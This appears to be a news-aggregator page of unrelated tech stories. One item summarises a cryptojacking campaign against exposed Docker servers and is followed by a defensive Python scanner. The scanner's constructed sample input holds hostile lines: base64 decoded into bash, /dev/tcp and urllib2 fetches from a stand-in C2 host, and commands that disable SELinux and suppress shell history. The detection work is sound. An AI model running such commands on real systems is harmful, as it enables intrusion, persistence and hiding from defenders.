Open Source

Linux Distributors' Alliance Continues Long-Term Support for Linux 4.14 (zdnet.com) 19

"Until recently, Linux kernel developers have been the ones keeping long-term support (LTS) versions of the Linux kernel patched and up to date," writes ZDNet.

"Then, because it was too much work with too little support, the Linux kernel developers decided to no longer support the older kernels." Greg Kroah-Hartman, the Linux kernel maintainer for the stable branch, announced that the Linux 4.14.336 release was the last maintenance update to the six-year-old LTS Linux 4.14 kernel series. It was the last of the line for 4.14. Or was it?

Kroah-Hartman had stated, "All users of the 4.14 kernel series must upgrade." Maybe not. OpenELA, a trade association of the Linux distributors CIQ (the company backing Rocky Linux), Oracle, and SUSE, is now offering — via its kernel-lts — a new lease on life for 4.14.

This renewed version, tagged with the following format — x.y.z-openela — is already out as v4.14.339-openela. The OpenELA acknowledges the large debt they owe to Kroah-Hartman and Sasha Levin of the Linux Kernel Stable project but underlines that their project is not affiliated with them or any of the other upstream stable maintainers. That said, the OpenELA team will automatically pull most LTS-maintained stable tree patches from the upstream stable branches. When there are cases where patches can't be applied cleanly, OpenELA kernel-lts maintainers will deal with these issues. In addition, a digest of non-applied patches will accompany each release of its LTS kernel, in mbox format.

"The OpenELA kernel-lts project is the first forum for enterprise Linux distribution vendors to pool our resources," an Oracle Linux SVP tells ZDNet, "and collaborate on those older kernels after upstream support for those kernels has ended." And the CEO of CIQ adds that after community support has ended, "We believe that open collaboration is the best way to maintain foundational enterprise infrastructure.

"Through OpenELA, vendors, users, and the open source community at large can work together to provide the longevity that professional IT organizations require for enterprise Linux."
Security

Misconfigured Cloud Servers Targeted with Linux Malware for New Cryptojacking Campaign (cadosecurity.com) 16

Researchers at Cado Security Labs received an alert about a honeypot using the Docker Engine API. "A Docker command was received..." they write, "that spawned a new container, based on Alpine Linux, and created a bind mount for the underlying honeypot server's root directory..." Typically, this is exploited to write out a job for the Cron scheduler to execute... In this particular campaign, the attacker exploits this exact method to write out an executable at the path /usr/bin/vurl, along with registering a Cron job to decode some base64-encoded shell commands and execute them on the fly by piping through bash.

The vurl executable consists solely of a simple shell script function, used to establish a TCP connection with the attacker's Command and Control (C2) infrastructure via the /dev/tcp device file. The Cron jobs mentioned above then utilise the vurl executable to retrieve the first stage payload from the C2 server... To provide redundancy in the event that the vurl payload retrieval method fails, the attackers write out an additional Cron job that attempts to use Python and the urllib2 library to retrieve another payload named t.sh

"Multiple user mode rootkits are deployed to hide malicious processes," they note. And one of the shell scripts "makes use of the shopt (shell options) built-in to prevent additional shell commands from the attacker's session from being appended to the history file... Not only are additional commands prevented from being written to the history file, but the shopt command itself doesn't appear in the shell history once a new session has been spawned."

The same script also inserts "an attacker-controlled SSH key to maintain access to the compromised host," according to the article, retrieves a miner for the Monero cryptocurrency and then "registers persistence in the form of systemd services" for both the miner and an open source Golang reverse shell utility named Platypus.

It also delivers "various utilities," according to the blog Security Week, "including 'masscan' for host discovery." Citing CADO's researchers, they write that the shell script also "weakens the machine by disabling SELinux and other functions and by uninstalling monitoring agents." The Golang payloads deployed in these attacks allow attackers to search for Docker images from the Ubuntu or Alpine repositories and delete them, and identify and exploit misconfigured or vulnerable Hadoop, Confluence, Docker, and Redis instances exposed to the internet... ["For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," the researchers write.]

"This extensive attack demonstrates the variety in initial access techniques available to cloud and Linux malware developers," Cado notes. "It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments."
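The host-side behaviours Cado describes above (a Cron job that base64-decodes commands and pipes them through bash, the /dev/tcp-based vurl helper, the urllib2 fallback, history suppression via shopt, and SELinux being disabled) can be hunted for in cron files and shell scripts. The following Python scanner is an added example, not code from Cado or from this page; the rule names, regexes, sample lines, the `c2.example.invalid` host and the `shopt -ou history` / `setenforce 0` forms are assumptions constructed for illustration.

```python
import base64
import re

# Behaviours named in the write-up, expressed as regexes (assumed forms).
RULES = {
    "b64-pipe-to-shell": re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b"),
    "dev-tcp-socket": re.compile(r"/dev/tcp/"),
    "vurl-helper": re.compile(r"(^|[\s/;|&])vurl\b"),
    "python-urllib2-fetch": re.compile(r"python[\d.]*\s+-c\b.*urllib2"),
    "history-tamper": re.compile(r"\bshopt\b[^;|&]*\bhistory\b"),
    "selinux-disabled": re.compile(r"\bsetenforce\s+0\b|SELINUX=disabled"),
}

# Long runs of base64 alphabet are decoded and rescanned, because the cron
# entry itself only shows an opaque blob; the real commands are inside it.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
MAX_DEPTH = 3  # stop on nested encodings rather than recursing forever


def decoded_layers(line):
    """Return text hidden in base64 tokens on this line, if it decodes cleanly."""
    layers = []
    for token in B64_TOKEN.findall(line):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet or not UTF-8: not a command
            continue
        if all(ch.isprintable() or ch in "\t\n" for ch in text):
            layers.append(text)
    return layers


def scan_line(line, depth=0):
    """Return the set of rule names matched by a line or its decoded layers."""
    hits = {name for name, rx in RULES.items() if rx.search(line)}
    if depth < MAX_DEPTH:
        for inner in decoded_layers(line):
            hits |= scan_line(inner, depth + 1)
    return hits


def scan(files):
    """files: {path: text}. Return [(path, line_number, sorted_rule_names)]."""
    findings = []
    for path, text in files.items():
        for number, line in enumerate(text.splitlines(), start=1):
            hits = scan_line(line)
            if hits:
                findings.append((path, number, sorted(hits)))
    return findings


# --- Constructed sample input (not taken from the campaign) ---------------
INNER = b"vurl c2.example.invalid /constructed-path"
CRON_B64 = ("*/5 * * * * root echo "
            + base64.b64encode(INNER).decode()
            + " | base64 -d | bash")
CRON_PY = ("0 * * * * root python -c \"import urllib2; "
           "urllib2.urlopen('http://c2.example.invalid/t.sh')\"")
CRON_OK = "30 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf"

SAMPLE_FILES = {
    "/etc/crontab": "\n".join([CRON_OK, CRON_B64, CRON_PY]),
    "/usr/bin/vurl": "exec 3<>/dev/tcp/203.0.113.10/80",
    "constructed-script.sh": "shopt -ou history\nsetenforce 0",
}

if __name__ == "__main__":
    for path, number, rules in scan(SAMPLE_FILES):
        print(f"{path}:{number}: {', '.join(rules)}")
```

The decode-and-rescan step is what surfaces the `vurl-helper` hit on the cron entry: the literal line contains only an opaque blob.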

Government

California State Legislator Proposes Ending Daylight Saving Time (cbs8.com) 186

Legislation proposed in California "aims to repeal Daylight saving time and put California permanently on Standard time," reports a San Diego news station:

In November 2018, California voters passed Prop 7, a measure that would allow the state legislature to change Daylight saving time by either keeping it year-round or getting rid of it altogether. However, this measure also requires approval by the U.S. Congress if California were to opt for year-round Daylight Saving Time. So far, nothing has materialized.

"I am really, really passionate about this bill," said State Assembly Member Tri Ta, who added it is finally time to listen to the will of the voters. He has drafted new legislation to do away with twice-yearly time changes. However, his bill would put the Golden State onto year-round Standard time: a move that would not require federal action. Oregon and Washington state are also considering similar moves [though Oregon's bill appears stalled]. "If my bill is passed, we do not need congressional approval," Ta told CBS 8, "so that's a win-win for everyone...."

Ta said that his bill has the support of the California Medical Association, as well as sleep experts who say Standard time syncs better with our natural clocks. "So why don't we go along with science?" Ta added. "That's what I believe." One thing most people seem to agree on: it's time to stop changing our clocks, which research has shown leads to higher rates of accidents as well as increased health risks.

"While this new bill continues to work its way through Sacramento, Daylight saving time is still a go here in California," the article points out, "starting 2 a.m. Sunday, when we set our clocks forward one hour."

But USA Today adds that across the rest of the country, "Most Americans — 62% — are in favor of ending the time change, according to an Economist/YouGov poll from last year."
Communications

America's Last Morse-Code Station (theatlantic.com) 113

A group of radio enthusiasts known as the "radio squirrels" are keeping the legacy of Morse code alive at KPH Maritime Radio, the last operational Morse code radio station in North America. Located in Point Reyes National Seashore, north of San Francisco, the station transmits maritime news and weather reports every Saturday, using vintage equipment dating back to World War II, reads a fast-paced story on The Atlantic. Despite the obsolescence of Morse code, the radio squirrels, along with a 17-year-old newcomer, are determined to preserve this unique form of communication.
Biotech

Scientists Pursue Cancer Vaccines Tailored to the Genetic Makeup of an Individual's Tumor (cnn.com) 49

"The Royal Swedish Academy of Sciences, which selects Nobel laureates in chemistry and physics, last week awarded Dr. Wu its Sjöberg Prize in honor of 'decisive contributions' to cancer research," reports CNN.

Their profile of the oncologist from Boston's Dana-Farber Cancer Institute notes Dr. Wu's research "has laid the scientific foundation for the development of cancer vaccines tailored to the genetic makeup of an individual's tumor." It's a strategy looking increasingly promising for some hard-to-treat cancers such as melanoma and pancreatic cancer, according to the results of early-stage trials, and may ultimately be widely applicable to many of the 200 or so forms of cancer...

The most common treatments for cancer — radiation therapy and chemotherapy — are like sledgehammers, striking all cells and often damaging healthy tissue. Since the 1950s, cancer researchers have been seeking a way to dial up the body's immune system, which naturally tries to fight cancer but is outsmarted by it, to attack tumor cells. Progress on that front was middling until about 2011 with the arrival of a class of drugs called checkpoint inhibitors, which boost the anti-tumor activity of T cells, an important part of the immune system... These drugs have helped some people with cancer who would have been given months to live survive for decades, but they don't work for all cancer patients, and researchers continue to look for ways to turbocharge the body's immune system against cancer...

Wu's research focused on small mutations in cancer tumor cells. These mutations, which occur as the tumor grows, create proteins that are slightly different to those in healthy cells. The altered protein generates what's called a tumor neoantigen that can be recognized by the immune system's T cells as foreign, and therefore susceptible to attack. With thousands of potential neoantigen candidates, Wu used "tour de force lab work" to identify the neoantigens that are on the cell surface, making them a potential target for a vaccine, said Urban Lendahl, professor of genetics at the Karolinska Institutet in Sweden and the secretary of the committee that awarded the prize. "If the immune system is to have a chance to attack the tumor, this difference must be manifested on the surface of the tumor cells. Otherwise, it's pretty pointless," Lendahl added...

By sequencing DNA from healthy and cancer cells, Wu and her team identified a cancer patient's unique tumor neoantigens. Synthetic copies of these unique neoantigens could be used as a personalized vaccine to activate the immune system to target the cancer cells... Once it had FDA approval, the team vaccinated six patients with advanced melanoma with a seven-shot course of patient-specific neoantigens vaccines. The breakthrough results were published in a 2017 article in Nature. For some patients, this treatment resulted in the immune system's cells being activated and targeting the tumor cells. The results, along with another paper published the same year led by the founders of mRNA vaccine company BioNTech, provided "proof of principle" that a vaccine can be targeted to a person's specific tumor, Lendahl said.

A follow-up by Wu's team four years after the patients received the vaccines, published in 2021, showed that the immune responses were effective in keeping cancer cells under control... Since then, Wu's team, other groups of medical researchers and pharmaceutical companies, including Merck, Moderna and BioNTech, have further developed this field of research, with trials underway for vaccines that treat pancreatic and lung cancer as well as melanoma.

"All the trials underway are small-scale, typically involving a handful of patients with later-stage disease and a high tolerance for safety risks," adds CNN.

"To show that these type of cancer vaccines work, much larger randomized control trials are needed."
Google

GPay App and P2P Payments Will Stop Working in the US This June (9to5google.com) 4

An anonymous reader shares a report: When Google Wallet launched in 2022, Google kept the "GPay" app around in a handful of countries. The company announced today that the old Google Pay app is soon going away in the US. That app, which appears as "GPay" on your Android homescreen, was Google's previous vision for mobile payments and finance.

It was "designed around your relationships with people and businesses" with conversation-like threads serving as a purchase history, while keeping track of your spending was another big aspect. GPay will stop working in the US from June 4, 2024. It will remain available for users in India and Singapore as Google continues to "build for the unique needs in those countries." As part of the app going away, Google is shutting down peer-to-peer payments that let you send, request, or receive money from others in the US. Google's P2P offering never really took off.

Businesses

'Step Away From CNBC' 82

Andrew Feinberg, writing for Slate: If you wanted to design a financial channel that would cause investors to underperform the stock market, you'd create CNBC, NBC's financial counterpart that runs on cable news and ostensibly tries to make viewers better investors. You'd make it sober and rational (well, there is Jim Cramer, but we'll get to him later), no need to feature anyone foaming at the mouth about stocks that could triple in six months or worried Cassandras warning that it's time to sell everything and burrow underground. And yet, you'd ensure that viewers stay engaged by keeping them on edge, worried and confused about what might happen next. Anxiety, you'd discover, is your friend, viewer hypervigilance your bread and butter.

In other words, CNBC makes viewers nervous in a very specific way. Nervous that they're about to lose money in a market downturn. Nervous that they might miss a hot trend or stock. Or uncertain that they're in the right sectors. Then an "expert" comes on and says, "Hey, you're in the wrong sectors -- it's time to leave tech for industrials, financials, and health care." In its sober, rational way, the network creates a sense of urgency. Although its tone is never like that of an infomercial, sometimes the message is similar. Act now. The problem is, hypervigilance is probably the worst quality most investors can have. "Sit on your ass," the late Charlie Munger advised investors, emphasizing that when it comes to investing, less is more. Feeling nervous leads to excessive trading. And "all the evidence shows that individual investors do worse the more they trade," says Jay Ritter, professor of finance at the University of Florida's Warrington College of Business. "Buying and selling something based on what you see on CNBC is not likely to be a successful strategy."
Apple

Why Some of Apple's Biggest Fans Are Returning Their Vision Pros 140

Apple is probably at least 18 months away from launching a second-generation Vision Pro. Based on the early response to the first version, that may be a long time for some people to wait. Bloomberg: Since the Vision Pro debuted on Feb. 2, it's become clear that the mixed-reality headset is still a work in progress. Despite the dazzling demos -- and generally positive reviews -- it can be challenging to use on a daily basis. It's heavy. The interface doesn't always work smoothly. And it's hard to forget the fact that you paid $3,500 or more for this experience. Vision Pro loyalists stress that the current model is only the first generation. It will get better in time. Don't forget, they say, that the original iPhone, iPad and Apple Watch had their quirks too. If the headset feels too heavy, you're wearing it wrong. The narrower-than-expected field of view and glare? That's normal. Now, it's true that Apple's earlier first-generation products had their issues. The initial iPhone couldn't connect to 3G networks and lacked the App Store or even the ability to cut and paste. The iPad didn't have multitasking. The original Apple Watch was too sluggish and wasn't waterproof. But I don't think anyone complained that those devices were too cumbersome, an actual pain to use or too expensive to justify keeping.

[...] Apple isn't commenting on the Vision Pro's return rate, but data from sources at retail stores suggests that it's likely somewhere between average and above average compared with other products -- depending on the location. Some smaller stores are seeing one or two returns per day, but larger locations have seen as many as over eight take-backs in a single day. [...] Based on what I've seen so far, the demos have been effective -- maybe too effective. They sell consumers on an experience that doesn't quite exist yet. Some stores are seeing conversion rates after demos as high as 10% to 15%. That's an impressive number for a product with the Vision Pro's price tag.
Biotech

What Happens After Throughput to DNA Storage Drives Surpasses 2 Gbps? (ieee.org) 35

High-capacity DNA data storage "is closer than you think," Slashdot wrote in 2019.

Now IEEE Spectrum brings an update on where we're at — and where we're headed — by a participant in the DNA storage collaboration between Microsoft and the Molecular Information Systems Lab of the Paul G. Allen School of Computer Science and Engineering at the University of Washington. "Organizations around the world are already taking the first steps toward building a DNA drive that can both write and read DNA data," while "funding agencies in the United States, Europe, and Asia are investing in the technology stack required to field commercially relevant devices." The challenging part is learning how to get the information into, and back out of, the molecule in an economically viable way... For a DNA drive to compete with today's archival tape drives, it must be able to write about 2 gigabits per second, which at demonstrated DNA data storage densities is about 2 billion bases per second. To put that in context, I estimate that the total global market for synthetic DNA today is no more than about 10 terabases per year, which is the equivalent of about 300,000 bases per second over a year. The entire DNA synthesis industry would need to grow by approximately 4 orders of magnitude just to compete with a single tape drive. Keeping up with the total global demand for storage would require another 8 orders of magnitude of improvement by 2030. But humans have done this kind of scaling up before. Exponential growth in silicon-based technology is how we wound up producing so much data. Similar exponential growth will be fundamental in the transition to DNA storage...

Companies like DNA Script and Molecular Assemblies are commercializing automated systems that use enzymes to synthesize DNA. These techniques are replacing traditional chemical DNA synthesis for some applications in the biotechnology industry... [I]t won't be long before we can combine the two technologies into one functional device: a semiconductor chip that converts digital signals into chemical states (for example, changes in pH), and an enzymatic system that responds to those chemical states by adding specific, individual bases to build a strand of synthetic DNA. The University of Washington and Microsoft team, collaborating with the enzymatic synthesis company Ansa Biotechnologies, recently took the first step toward this device... The path is relatively clear; building a commercially relevant DNA drive is simply a matter of time and money...

At the same time, advances in DNA synthesis for DNA storage will increase access to DNA for other uses, notably in the biotechnology industry, and will thereby expand capabilities to reprogram life. Somewhere down the road, when a DNA drive achieves a throughput of 2 gigabases per second (or 120 gigabases per minute), this box could synthesize the equivalent of about 20 complete human genomes per minute. And when humans combine our improving knowledge of how to construct a genome with access to effectively free synthetic DNA, we will enter a very different world... We'll be able to design microbes to produce chemicals and drugs, as well as plants that can fend off pests or sequester minerals from the environment, such as arsenic, carbon, or gold. At 2 gigabases per second, constructing biological countermeasures against novel pathogens will take a matter of minutes. But so too will constructing the genomes of novel pathogens. Indeed, this flow of information back and forth between the digital and the biological will mean that every security concern from the world of IT will also be introduced into the world of biology...

The future will be built not from DNA as we find it, but from DNA as we will write it.

The article makes an interesting point — that biology labs around the world already order chemically-synthesized ssDNA, "delivered in lengths of up to several hundred bases," and sequence DNA molecules up to thousands of bases in length.

"In other words, we already convert digital information to and from DNA, but generally using only sequences that make sense in terms of biology."
Nintendo

F-Zero Courses From a Dead Nintendo Satellite Service Restored Using VHS and AI (arstechnica.com) 15

An anonymous reader quotes a report from Ars Technica: Nintendo's Satellaview, a Japan-only satellite add-on for the Super Famicom, is a rich target for preservationists because it was the home to some of the most ephemeral games ever released. That includes a host of content for Nintendo's own games, including F-Zero. That influential Super Nintendo (Super Famicom in Japan) racing title was the subject of eight weekly broadcasts sent to subscribing Japanese homes in 1996 and 1997, some with live "Soundlink" CD-quality music and voiceovers. When live game broadcasts were finished, the memory cartridges used to store game data would report themselves as empty, even though they technically were not. Keeping that same 1MB memory cartridge in the system when another broadcast started would overwrite that data, and there were no rebroadcasts.

As reported by Matthew Green at Press the Buttons (along with Did You Know Gaming's informative video), data from some untouched memory cartridges was found and used to re-create some of the content. Some courses, part of a multi-week "Grand Prix 2" event, have never been found, despite a $5,000 bounty offering and extensive effort. And yet, remarkably, the 10 courses in those later broadcasts were reverse-engineered, using a VHS recording, machine learning tools, and some manual pixel-by-pixel re-creation. The results are "north of 99.9% accurate," according to those who crafted it and exist now as a mod you can patch onto an existing F-Zero ROM. [...] Their work means that, 25 years later, a moment in gaming that was nearly lost to time and various corporate currents has been, if not entirely restored, brought as close as is humanly (and machine-ably) possible to what it once was.

Linux

'Damn Small Linux' is Back - But Bigger (itsfoss.com) 100

Back in 2006 Slashdot reported on a 50-megabyte "micro" distro called Damn Small Linux. (And in 2012 we wrote that it "rose from the dead" with a new release candidate.)

Now Damn Small Linux has been reborn again, according to its developer's web site: Creating the original DSL, a versatile 50MB distribution, was a lot of fun and one of the things I am most proud of as a personal accomplishment. However, as a concept, it was in the right place at the right time, and the computer industry has changed a lot since then. While it would be possible to make a bootable Xwindows 50MB distribution today, it would be missing many drivers and have only a handful of very rudimentary applications. People would find such a distribution a fun toy or something to build upon, but it would not be usable for the average computer user out of the gate....

The new goal of DSL is to pack as much usable desktop distribution into an image small enough to fit on a single CD, or a hard limit of 700MB. This project is meant to service older computers and have them continue to be useful far into the future. Such a notion sits well with my values. I think of this project as my way of keeping otherwise usable hardware out of landfills.

As with most things in the GNU/Linux community, this project continues to stand on the shoulders of giants. I am just one guy without a CS degree, so for now, this project is based on antiX 23 i386... a fantastic distribution that I think shares much of the same spirit as the original DSL project. AntiX shares pedigree with MEPIS and also leans heavily on the geniuses at Debian.

The blog It's FOSS News describes it as "a unique experience in a sea of Debian-based and Fedora-based distros." It is offered with two window managers, Fluxbox and JWM, with apt being fully enabled by default for easy package installations... At the time of writing, only the Alpha ISOs were made available on the official downloads page. It is only a matter of time before we get a stable release.
Electronic Frontier Foundation

EFF Challenges 'Legal Bullying' of Sites Reporting on Alleged Appin 'Hacking-for-Hire' (eff.org) 16

Long-time Slashdot reader v3rgEz shared this report from MuckRock: Founded in 2003, Appin has been described as a cybersecurity company and an educational consulting firm. Appin was also, according to Reuters reporting and extensive marketing materials, a prolific "hacking for hire" service, stealing information from politicians and militaries as well as businesses and even unfaithful spouses.

Legal letters, being sent to newsrooms and organizations around the world, are trying to remove that story from the internet — and are often succeeding.

Reuters' investigation, published in November, was based in part on corroborated marketing materials, detailing a range of "hacking for hire" services Appin provided. After publication, Reuters was targeted by a legal campaign to shut down critical reporting, an effort which expanded to target news organizations around the world, including MuckRock. With the help of the Electronic Frontier Foundation, MuckRock is now sharing more details on this effort while continuing to host materials the Association of Appin Training Centers has gone to great lengths to remove from the web.

The original story, by Reuters' staff writers Raphael Satter, Zeba Siddiqui and Chris Bing, is no longer available on the Reuters website. Following a preliminary court ruling issued in New Delhi, the story has been replaced with an editor's note, stating that Reuters "stands by its reporting and plans to appeal the decision." The story has since been reposted on Distributed Denial of Secrets, while the primary source materials that Reuters reporters and editors used in their reporting are available on MuckRock's DocumentCloud service.

Representatives of the company's founders denied the assertions in the Reuters story, insisting instead that rogue actors "were misusing the Appin name."

TechDirt titled their article "Sorry Appin, We're Not Taking Down Our Article About Your Attempts To Silence Reporters."

And Thursday the EFF wrote its own take on "a campaign of bullying and censorship seeking to wipe out stories about the mercenary hacking campaigns of a less well-known company, Appin Technology, in general, and the company's cofounder, Rajat Khare, in particular." These efforts follow a familiar pattern: obtain a court order in a friendly international jurisdiction and then misrepresent the force and substance of that order to bully publishers around the world to remove their stories. We are helping to push back on that effort, which seeks to transform a very limited and preliminary Indian court ruling into a global takedown order. We are representing Techdirt and MuckRock Foundation, two of the news entities asked to remove Appin-related content from their sites... On their behalf, we challenged the assertions that the Indian court either found the Reuters reporting to be inaccurate or that the order requires any entities other than Reuters and Google to do anything. We requested a response — so far, we have received nothing...

At the time of this writing, more than 20 of those stories have been taken down by their respective publications, many at the request of an entity called "Association of Appin Training Centers (AOATC)...." It is not clear who is behind The Association of Appin Training Centers, but according to documents surfaced by Reuters, the organization didn't exist until after the lawsuit was filed against Reuters in Indian court....

If a relatively obscure company like AOATC or an oligarch like Rajat Khare can succeed in keeping their name out of the public discourse with strategic lawsuits, it sets a dangerous precedent for other larger, better-resourced, and more well-known companies such as Dark Matter or NSO Group to do the same. This would be a disaster for civil society, a disaster for security research, and a disaster for freedom of expression.

Open Source

Hugging Face Launches Open Source AI Assistant Maker To Rival OpenAI's Custom GPTs (venturebeat.com) 11

Carl Franzen reports via VentureBeat: Hugging Face, the New York City-based startup that offers a popular, developer-focused repository for open source AI code and frameworks (and hosted last year's "Woodstock of AI"), today announced the launch of third-party, customizable Hugging Chat Assistants. The new, free product offering allows users of Hugging Chat, the startup's open source alternative to OpenAI's ChatGPT, to easily create their own customized AI chatbots with specific capabilities, similar both in functionality and intention to OpenAI's custom GPT Builder -- though that requires a paid subscription to ChatGPT Plus ($20 per month), Team ($25 per user per month paid annually), and Enterprise (variable pricing depending on the needs).

Phillip Schmid, Hugging Face's Technical Lead & LLMs Director, posted the news on the social network X (formerly known as Twitter), explaining that users could build a new personal Hugging Face Chat Assistant "in 2 clicks!" Schmid also openly compared the new capabilities to OpenAI's custom GPTs. However, in addition to being free, the other big difference between Hugging Chat Assistant and the GPT Builder and GPT Store is that the latter tools depend entirely on OpenAI's proprietary large language models (LLM) GPT-4 and GPT-4 Vision/Turbo. Users of Hugging Chat Assistant, by contrast, can choose which of several open source LLMs they wish to use to power the intelligence of their AI Assistant on the backend, including everything from Mistral's Mixtral to Meta's Llama 2. That's in keeping with Hugging Face's overarching approach to AI -- offering a broad swath of different models and frameworks for users to choose between -- as well as the same approach it takes with Hugging Chat itself, where users can select between several different open source models to power it.

Bitcoin

Over 2 Percent of the US's Electricity Generation Now Goes To Bitcoin (arstechnica.com) 106

"In the last few years, the U.S. has seen a boom in cryptocurrency mining," writes Ars Technica. But they add that the U.S. government "is now trying to track exactly what that means for the consumption of electricity. Specifically, a crucial branch of the U.S. Department of Energy.

"While its analysis is preliminary, the Energy Information Agency (EIA) estimates that large-scale cryptocurrency operations are now consuming over 2 percent of the U.S.'s electricity. That's roughly the equivalent of having added an additional state to the grid over just the last three years."

While there is some small-scale mining that goes on with personal computers and small rigs, most cryptocurrency mining has moved to large collections of specialized hardware. While this hardware can be pricy compared to personal computers, the main cost for these operations is electricity use, so the miners will tend to move to places with low electricity rates. The EIA report notes that, in the wake of a crackdown on cryptocurrency in China, a lot of that movement has involved relocation to the U.S., where keeping electricity prices low has generally been a policy priority.

One independent estimate made by the Cambridge Centre for Alternative Finance had the US as the home of just over 3 percent of the global bitcoin mining at the start of 2020. By the start of 2022, that figure was nearly 38 percent... The EIA decided it needed a better grip on what was going on... To better understand the implications of this major new drain on the U.S. electric grid, the EIA will be performing monthly analyses of bitcoin operations during the first half of 2024.

The Energy Information Agency identified 137 bitcoin mining operators, of which 101 responded to inquiries about their full-capacity power supply. "If running all-out, those 101 facilities would consume 2.3 percent of the US's average power demand," the article points out. And they add that in at least five instances, the Agency found bitcoin operators had "moved in near underutilized power plants and sent generation soaring again...

"These are almost certainly fossil fuel plants that might be reasonable candidates for retirement if it weren't for their use to supply bitcoin miners."
Supercomputing

Investors Threw 50% Less Money At Quantum Last Year (theregister.com) 32

Dan Robinson reports via The Register: Quantum companies received 50 percent less venture cap funding last year as investors switched to generative AI or shied away from risky bets on Silicon Valley startups. Progress in quantum computing is being made, but practical applications of the technology are still likely years away. Investment in quantum technology reached a high of $2.2 billion in 2022, as confidence (or hype) grew in this emerging market, but that funding fell to about $1.2 billion last year, according to the latest State of Quantum report, produced by The Quantum Insider, with quantum computing company IQM, plus VCs OpenOcean and Lakestar. The picture is even starker in the US, where there was an 80 percent decline in venture capital for quantum, while the APAC region dropped by 17 percent, and EMEA grew slightly by three percent.

But the report denies that we have reached a "quantum winter," comparable with the "AI winter" periods of scarce funding and little progress. Instead, the quantum industry continues to progress towards useful quantum systems, just at a slower pace, and the decline in funding must be seen as part of broader venture capital trends, it insists. "Calendar year 2023 was an interesting year with regards to quantum," Heather West, research manager for Quantum Computing, Infrastructure Systems, Platforms, and Technology at IDC told The Register. "With the increased interest in generative AI, we started to observe that some of the funding that was being invested into quantum was transferred to AI initiatives and companies. Generative AI was seen as the new disruptive technology which end users could use immediately to gain an advantage or value, whereas quantum, while expected to be a disruptive technology, is still very early in development," West told The Register.

Gartner Research vice president Matthew Brisse agreed. "It's due to the slight shift of CIO priorities toward GenAI. If organizations were spending 10 innovation dollars on quantum, now they are spending five. Not abandoning it, but looking at GenAI to provide value sooner to the organization than quantum," he told us. Meanwhile, venture capitalists in America are fighting shy of risky bets on Silicon Valley startups and instead keeping their powder dry as they look to more established technology companies or else shore up their existing portfolio of investments, according to the Financial Times.

IT

Most CEOs Won't Prioritize Return-to-Office Policies, Survey Finds (axios.com) 101

The pandemic may have proved to employers that remote and flexible-work arrangements were viable — and changed the way we work forever. Axios writes: Just 6 out of 158 U.S. CEOs said they'll prioritize bringing workers back to the office full-time in 2024, according to a new survey released by the Conference Board. Executives are increasingly resigned to a world where employees don't come in every day, as hybrid work arrangements — mixing work from home and in-office — become the norm for knowledge workers. "Maintain hybrid work," was cited as a priority by 27% of the U.S. CEOs who responded to the survey, conducted in October and November. A separate survey of chief financial officers by Deloitte, conducted in November, found that 65% of CFOs expect their company to offer a hybrid arrangement this year.

"Remote work appears likely to be the most persistent economic legacy of the pandemic," write Goldman Sachs economists in a recent note. About 20%-25% of workers in the U.S. work from home at least part of the week, according to data Goldman cites. That's below a peak of 47% during the pandemic but well above its prior average of around 3%.

"The battle is over," said Diana Scott, human capital center leader at The Conference Board. "There are so many other issues CEOs are facing." Headlines about CEOs determined to get butts in seats get attention, but they are the exception, says Brian Elliott, the cofounder of Future Forum, a future of work think tank. "There are a lot more CEOs that are actually quietly becoming more flexible...." Though the labor market has softened, employers still do care about keeping employees satisfied — and they don't want to fight with them. "It's not worth the fight," says Elliott.

News

David Mills, an Internet Pioneer, Has Died 19

David Mills, the man who invented NTP and wrote the implementation, has passed away. He also created the Fuzzballs and EGP, and helped make global-scale internetworking possible. Vint Cerf, sharing the news on the Internet Society mail group: His daughter, Leigh, just sent me the news that Dave passed away peacefully on January 17, 2024. He was such an iconic element of the early Internet.

Network Time Protocol, the Fuzzball routers of the early NSFNET, INARG taskforce lead, COMSAT Labs and University of Delaware and so much more.

R.I.P.
Science

Physicists Design a Way to Detect Quantum Behavior in Large Objects, Like Us (sciencealert.com) 20

Researchers have developed a way to apply quantum measurement to something no matter its mass or energy. "Our proposed experiment can test if an object is classical or quantum by seeing if an act of observation can lead to a change in its motion," says physicist Debarshi Das from UCL. ScienceAlert reports: Quantum physics describes a Universe where objects aren't defined by a single measurement, but as a range of possibilities. An electron can be spinning up and down, or have a high chance of existing in some areas more than others, for example. In theory, this isn't limited to tiny things. Your own body can in effect be described as having a very high probability of sitting in that chair and a very (very!) low probability of being on the Moon. There is just one fundamental truth to remember -- you touch it, you've bought it. Observing an object's quantum state, whether an electron, or a person sitting in a chair, requires interactions with a measuring system, forcing it to have a single measurement. There are ways to catch objects with their quantum pants still down, but they require keeping the object in a ground state -- super-cold, super-still, completely cut off from its environment. That's tricky to do with individual particles, and it gets a lot more challenging as the size of the scale goes up.

The new proposal uses an entirely novel approach, one that uses a combination of assertions known as Leggett-Garg Inequalities and No-Signaling in Time conditions. In effect, these two concepts describe a familiar Universe, where a person on a chair is sitting there even if the room is dark and you can't see them. Switching on the light won't suddenly reveal they're actually under the bed. Should an experiment find evidence that somehow conflicts with these assertions, we just might be catching a glimpse of quantum fuzziness on a larger scale.

The team proposes that objects can be observed as they oscillate on a pendulum, like a ball at the end of a piece of string. Light would then be flashed at the two halves of the experimental setup at different times -- counting as the observation -- and the results of the second flash would indicate if quantum behavior was happening, because the first flash would affect whatever was moving. We're still talking about a complex setup that would require some sophisticated equipment, and conditions akin to a ground state -- but through the use of motion and two measurements (light flashes), some of the restrictions on mass are removed. [...]
"The next step is to try this proposed setup in an actual experiment," concludes the report. "The mirrors at the Laser Interferometer Gravitational-Wave Observatory (LIGO) in the US have already been proposed as suitable candidates for examination."

"Those mirrors act as a single 10-kilogram (22-pound) object, quite a step up from the typical size of objects analyzed for quantum effects -- anything up to about a quintillionth of a gram."

The findings have been published in the journal Physical Review Letters.
EU

Python Software Foundation Says EU's 'Cyber Resilience Act' Includes Wins for Open Source (blogspot.com) 18

Last April the Python Software Foundation warned that Europe's proposed Cyber Resilience Act jeopardized their organization and "the health of the open-source software community" with overly broad policies that "will unintentionally harm the users they are intended to protect."

